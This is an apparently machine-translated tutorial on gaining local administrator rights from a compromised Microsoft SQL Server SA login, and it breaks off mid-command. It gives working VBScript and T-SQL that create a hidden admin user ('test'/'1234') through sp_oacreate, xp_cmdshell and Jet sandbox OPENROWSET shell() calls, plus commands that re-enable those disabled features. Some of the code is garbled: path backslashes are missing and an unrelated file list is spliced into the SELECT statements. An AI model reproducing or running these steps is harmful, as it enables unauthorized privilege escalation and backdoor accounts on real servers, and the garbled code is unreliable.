SA password to access, often because the server administrator, or "previous" will net.exe and net1.exe are restricted to use the administrator account can not be added. We know that VBS in Active Directory (ADSI) section has a winnt object, used to manage local resources, using it can not rely on the command CMD such as the administrator can add a specific code:
set wsnetwork = CreateObject ("WSCRIPT.NETWORK")
os = "WinNT ://"& wsnetwork.ComputerName
Set ob = GetObject (os) 'get adsi interface, binding
Set oe = GetObject (os & "/ Administrators, group") 'property, admin group
Set od = ob.Create ("user", "test") 'set up user
od.SetPassword "1234" 'Set Password
od.SetInfo 'Save
Set of = GetObject (os & "/ test", user) 'get the user
oe.add os & "/ test"
The code above to save 1.vbs, then execute the command for the "cscript 1.vbs", so the system will add a system called the test, the user password is 1234. Specific implementation of the code in Query Analyzer as follows:
declare @ o int, @ f int, @ t int, @ ret int
exec sp_oacreate 'scripting.filesystemobject', @ o out
exec sp_oamethod @ o, 'createtextfile', @ f out, 'c: 1.vbs', 1
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'set wsnetwork = CreateObject
("WSCRIPT.NETWORK") '
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'os = "WinNT ://"& wsnetwork.
ComputerName '
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'Set ob = GetObject (os)'
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'Set oe = GetObject
(Os & "/ Administrators, group") '
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'Set od = ob.Create
("User", "test") '
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'od.SetPassword "1234"'
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'od.SetInfo'
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'Set of = GetObject
(Os & "/ test", user) '
exec @ ret = sp_oamethod @ f, 'writeline', NULL, 'oe.add os & "/ test"'
Through the above statement, then execute the following line of code, this line must separate the implementation, not with the implementation of the above together, otherwise it will prompt "c: 1.vbs is run by another program" can not successfully add the user :
exec master .. xp_cmdshell 'cscript c: 1.vbs'
If the system user does not have added successfully, it may be because the system user's password 1234 is too simple, does not meet the complex password policy server, consider more complicated settings, and then test. You can also use echo to write 1.vbs code, the code format is:
exec master .. xp_cmdshell 'echo set wsnetwork = CreateObject ("WSCRIPT.NETWORK")
>> 1.vbs'
However, do not understand why all with "&" characters in command lines can not write 1.vbs, interested friends can try to resolve what.
Using jet sand table model can be solved XP_cmdshell other stored procedures and relevant dynamic link library annoyance. For security reasons, the system does not default to open sandbox mode, which requires xp_regwrite open sandbox mode:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftJet4.0
Engines', 'SandBoxMode', 'REG_DWORD', 1
Then run the sand table command, the system adds a user named test, the password for the 1234 users:
select backup bin conf config data eshow_sitemap.html generate.sh log maint sitemap.html svn tmp from openrowset ('microsoft.jet.oledb.4.0', '; database = c: windows
system32iasias.mdb ',' select shell ("cmd.exe / c net user test 1234 / add") ')
select backup bin conf config data eshow_sitemap.html generate.sh log maint sitemap.html svn tmp from openrowset ('microsoft.jet.oledb.4.0', '; database = c: windows
system32iasias.mdb ',' select shell ("cmd.exe / c net localgroup
administrators test / add ") ')
Different operating systems, the path is not the same need to make changes to the situation:
NT/2K: c: winntsystem32
XP/2003: c: windowssystem32
Another Microsoft SQL Server2005 in default, the number of stored procedure is closed and requires a command to open:
Open XP_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure
'Xp_cmdshell', 1; RECONFIGURE;
Open 'OPENROWSET':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure
'Ad Hoc Distributed Queries', 1; RECONFIGURE;
Open 'sp_oacreate':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp